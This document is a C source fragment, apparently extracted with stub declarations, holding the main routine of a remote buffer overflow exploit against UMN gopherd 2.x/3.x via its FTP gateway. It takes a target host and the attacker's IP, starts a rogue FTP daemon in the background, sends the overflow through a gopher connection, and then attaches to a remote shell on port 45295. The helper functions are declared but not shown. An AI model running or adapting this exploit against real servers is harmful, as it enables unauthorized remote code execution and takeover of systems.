
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int RETADDR ;
 int SIGALRM ;
 int SIGINT ;
 int SIG_DFL ;
 int _exit (int ) ;
 void* atoi (char*) ;
 int exit (int) ;
 int fork () ;
 int ftp_pid ;
 int ftpd () ;
 int getshell (char*,int) ;
 int gopher_connect (char*,unsigned short,char*) ;
 scalar_t__ index (char*,char) ;
 int offset_ra ;
 int printe (char*,int) ;
 int printf (char*,...) ;
 int sig_alarm ;
 int sig_ctrlc_exit ;
 int sig_ctrlc_wait ;
 int signal (int ,int ) ;
 scalar_t__ strdup (char*) ;
 unsigned int strlen (char*) ;
 int waitpid (int ,int ,int ) ;

int main(int argc,char **argv){
 unsigned short gopher_port=70;
 unsigned int i=0;
 char *gopher_host;
 printf("[*] UMN gopherd[2.x.x/3.x.x]: remote buffer o"
 "verflow exploit.\n[*] \"UMN gopherd remote ftp gatew"
 "ay buffer overflow\"\n[*] by: vade79/v9 v9@fakehalo."
 "deadpig.org (fakehalo)\n\n");
 if(argc<3){
  printf("[!] syntax: %s <hostname[:port]> <local/your"
  "_ip> [offset]\n\n",argv[0]);
  exit(1);
 }
 if(!(gopher_host=(char *)strdup(argv[1])))
  printe("main(): allocating memory failed",1);
 for(i=0;i<strlen(gopher_host);i++)
  if(gopher_host[i]==':')
   gopher_host[i]=0x0;
 if(index(argv[1],':'))
  gopher_port=atoi((char *)index(argv[1],':')+1);
 if(!gopher_port)
  gopher_port=70;
 if(argc>3)
  offset_ra=atoi(argv[3]);
 printf("[*] target: %s:%d - localhost: %s - offset: 0x%.8x(+"
 "%u)\n\n",gopher_host,gopher_port,argv[2],RETADDR,offset_ra);
 signal(SIGINT,sig_ctrlc_wait);
 signal(SIGALRM,sig_alarm);

 switch(ftp_pid=fork()){
  case -1:
   printe("fork() ftpd failure.",1);
   break;
  case 0:
   signal(SIGINT,SIG_DFL);
   ftpd();
   _exit(0);
   break;
  default:
   printf("[*] starting ftp daemon. (background)\n");
   break;
 }
 gopher_connect(gopher_host,gopher_port,argv[2]);

 printf("[*] waiting for ftp daemon to finish. (ctrl-c if"
 " needed)\n");
 waitpid(ftp_pid,0,0);
 signal(SIGINT,sig_ctrlc_exit);
 getshell(gopher_host,45295);
 printf("[!] exploit failed.\n");
 exit(0);
}
